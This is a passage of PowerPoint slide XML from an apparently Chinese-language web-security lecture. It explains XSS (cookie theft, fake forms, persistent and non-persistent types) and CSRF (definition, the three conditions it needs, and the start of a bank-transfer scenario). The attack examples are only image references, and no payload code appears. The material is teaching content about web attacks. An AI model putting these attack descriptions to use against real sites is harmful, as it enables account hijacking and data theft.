            <a:pPr marL="742950" lvl="1" indent="-285750" latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用虚假输入表单骗取用户个人信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用脚本窃取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>值，被害者在不知情的情况下，帮助攻击者发送恶意请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示伪造的文章或图片。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的原理是恶意攻击者往 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>页面里插入恶意可执行网页脚本代码，当用户浏览该页之时，嵌入其中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>里面的脚本代码会被执行，从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D32F28AF-FA4E-47FF-A3F8-73664DE6A3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="697500" y="3639763"/>
            <a:ext cx="5545088" cy="1128714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E54D23-3BE8-4864-A2C9-822627E0784D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="895138" y="5127077"/>
            <a:ext cx="4670614" cy="1452208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89168781-E0DB-42CA-BF74-9C38BD202E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2499823" y="4793888"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>非持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0DEE797-C659-4685-932F-7293213C9398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2419594" y="6450808"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90185C52-F460-47CA-9FEB-D5AF4A55A718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6673315" y="5651747"/>
            <a:ext cx="5304864" cy="927538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC110B7B-1D7B-433C-B574-07598E422047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8389268" y="6523238"/>
            <a:ext cx="1778828" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击范例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF54136D-8DC1-41AC-857E-48DABA9C04C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579185" y="3568465"/>
            <a:ext cx="5304864" cy="1647832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3F5751-3AD2-4687-8EEB-0361358A44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7275279" y="5282681"/>
            <a:ext cx="4238064" cy="193898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCB68FB-EE38-4435-BB0D-BBC27D183B53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8202706" y="5391465"/>
            <a:ext cx="2100737" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>非持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击范例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3611216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2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站请求伪造</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584529" y="983142"/>
            <a:ext cx="10769271" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF(Cross Site Request Forgery)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，即跨站请求伪造，是一种常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击，它利用用户已登录的身份，在用户毫不知情的情况下，以用户的名义完成非法操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89168781-E0DB-42CA-BF74-9C38BD202E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8837213" y="3692612"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4104" name="Picture 8" descr="https://segmentfault.com/img/remote/1460000018073851?w=432&amp;h=303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85301FF-6021-4312-843E-D3AD70D97E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49837" y="1471205"/>
            <a:ext cx="3177220" cy="2228466"/>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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B054CB-9FD3-4BD6-8447-F4F9D016733F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1623523" y="1936749"/>
            <a:ext cx="6009012" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>完成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击必须要有三个条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>用户已经登录了站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，并在本地记录了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>在用户没有登出站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的情况下（也就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>生效的情况下），访问了恶意攻击者提供的引诱危险站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B (B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>站点要求访问站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>没有做任何 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1542C06B-FEFD-4AE2-B1E5-7A09AA6DA016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1623523" y="4529510"/>
            <a:ext cx="5778810" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>当我们登入转账页面后，突然眼前一亮惊现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"XXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
